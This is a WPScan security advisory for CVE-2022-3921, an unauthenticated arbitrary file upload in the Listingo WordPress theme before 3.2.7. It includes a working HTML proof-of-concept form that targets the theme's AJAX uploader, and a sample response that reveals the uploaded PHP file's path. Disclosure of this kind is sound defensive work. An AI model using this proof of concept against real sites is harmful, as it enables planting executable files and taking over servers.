WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

Themes Vulnerabilities

Listingo < 3.2.7 - Unauthenticated Arbitrary File Upload

Description

The theme does not validate files to be uploaded via an AJAX action available to unauthenticated users, which could allow them to upload arbitrary files and lead to RCE

Proof of Concept

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Listingo Unauthenticated File Upload</title>
</head>
<body>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=listingo_temp_uploader" method="post" enctype="multipart/form-data">
        Upload a File:
        <input type="file" name="listingo_uploader" id="listingo_uploader">
        <input type="submit" name="submit" value="Start Upload">
    </form>
</body>
</html>

The response give the path to the file uploaded:
{"type":"success","url":"https:\/\/example.com\/wp-content\/uploads\/wp-custom-uploader\/1665086303.php","filename":"1665086303.php","message":"Image deleted."}

Affects Themes

listingo
Fixed in version 3.2.7

References

CVE
CVE-2022-3921

Classification

Type

UPLOAD

CWE
CWE-434

Miscellaneous

Original Researcher

Fioravante Souza

Submitter

Fioravante Souza

Submitter website
https://jetpack.com
Submitter twitter
fiocavallari
Verified

Yes

WPVDB ID
e39b59b0-f24f-4de5-a21c-c4de34c3a14f

Timeline

Publicly Published

2022-11-21 (about 6 months ago)

Added

2022-11-21 (about 6 months ago)

Last Updated

2022-12-12 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin